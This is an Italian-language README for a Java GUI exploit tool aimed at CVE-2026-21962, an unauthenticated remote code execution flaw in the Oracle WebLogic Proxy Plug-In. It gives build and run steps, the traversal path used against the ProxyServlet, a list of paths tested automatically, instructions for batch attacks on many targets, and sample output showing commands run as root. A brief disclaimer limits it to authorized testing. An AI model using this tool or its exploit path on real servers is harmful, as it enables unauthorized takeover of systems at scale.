
Java GUI tool per lo sfruttamento di CVE-2026-21962, una RCE non autenticata nel Proxy Plug-In di Oracle WebLogic, che consente l'esecuzione di comandi multi-target via HTTP.
Versione GUI Java dello strumento di exploit per la vulnerabilità RCE (Remote Code Execution) del Proxy Plug-In di Oracle WebLogic Server.
java-version/
├── pom.xml # File di configurazione del progetto Maven
├── README.md # Documentazione del progetto
├── run.bat # Script di avvio per Windows
└── src/
└── main/
└── java/
└── com/
└── ashwesker/
└── cve202621962/
├── Main.java # Punto di ingresso del programma
├── core/
│ └── Exploit.java # Logica principale dell'exploit
├── gui/
│ └── MainWindow.java # Finestra principale della GUI
└── util/
└── HttpClient.java # Utilità per le richieste HTTP
La finestra del programma contiene le seguenti aree:
Area dei parametri di input (in alto)
Area dei pulsanti (al centro)
Area del log di esecuzione (in basso a sinistra)
Area di output dei comandi (in basso a destra)
cd java-version
mvn clean compile
mvn clean package
Il file JAR creato si trova in: target/cve-2026-21962-1.0.0.jar
Fare doppio clic sul file run.bat per avviare il programma
cd java-version
mvn exec:java -Dexec.mainClass="com.ashwesker.cve202621962.Main"
java -jar target/cve-2026-21962-1.0.0.jar
cd java-version
mvn clean compile
java -cp "target/classes;[percorso-dipendenze-jar]" com.ashwesker.cve202621962.Main
URL di destinazione:
http://192.168.1.100:7001
Comando da eseguire:
whoami
URL di destinazione:
http://192.168.1.100:7001
http://192.168.1.101:7001
http://192.168.1.102:7001
https://weblogic.example.com:4443
Comando da eseguire:
id
Esempio di output:
[*] Avvio del test della vulnerabilità...
[*] URL di destinazione: http://192.168.1.100:7001
[*] Comando da eseguire: id
[*] Percorso di test: http://192.168.1.100:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] Successo! Codice di stato: 200
[+] Comando eseguito con successo!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
================================================================================
[*] Avvio del test della vulnerabilità...
[*] URL di destinazione: http://192.168.1.101:7001
[*] Comando da eseguire: id
[*] Percorso di test: http://192.168.1.101:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] Successo! Codice di stato: 200
[+] Comando eseguito con successo!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
Dopo l'avvio del programma, inserire l'indirizzo del server di destinazione nel campo di testo "URL di destinazione"
http://target:7001 o https://oracle-server:4443Inserire il comando da eseguire nel campo "Comando da eseguire"
whoami, id, powershell -c ... ecc.Fare clic sul pulsante "Esegui exploit" per avviare il test
Consultare il "Log di esecuzione" in basso per conoscere il processo di test
Consultare l'"Output dei comandi" in basso per ottenere i risultati dell'esecuzione dei comandi
Inserire più indirizzi di destinazione nel campo di testo "URL di destinazione", uno per riga
http://target1:7001
http://target2:7001
https://target3:4443
Inserire il comando da eseguire nel campo "Comando da eseguire"
Fare clic sul pulsante "Esegui exploit" per avviare il test batch
Il programma testerà ogni destinazione in sequenza; gli output delle diverse destinazioni sono separati da ================ (80 segni di uguale)
Consultare il "Log di esecuzione" in basso per conoscere il processo di test di ogni destinazione
Consultare l'"Output dei comandi" in basso per ottenere i risultati dell'esecuzione dei comandi di tutte le destinazioni
Il programma testa automaticamente i seguenti percorsi:
/weblogic//wl_proxy//bea_wls_internal//_proxy//proxy/⚠️ Attenzione: questo strumento è destinato esclusivamente a test di sicurezza autorizzati. L'uso non autorizzato di questo strumento per attaccare sistemi è illegale.
Main.java
Exploit.java
MainWindow.java
HttpClient.java
Questo progetto è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza.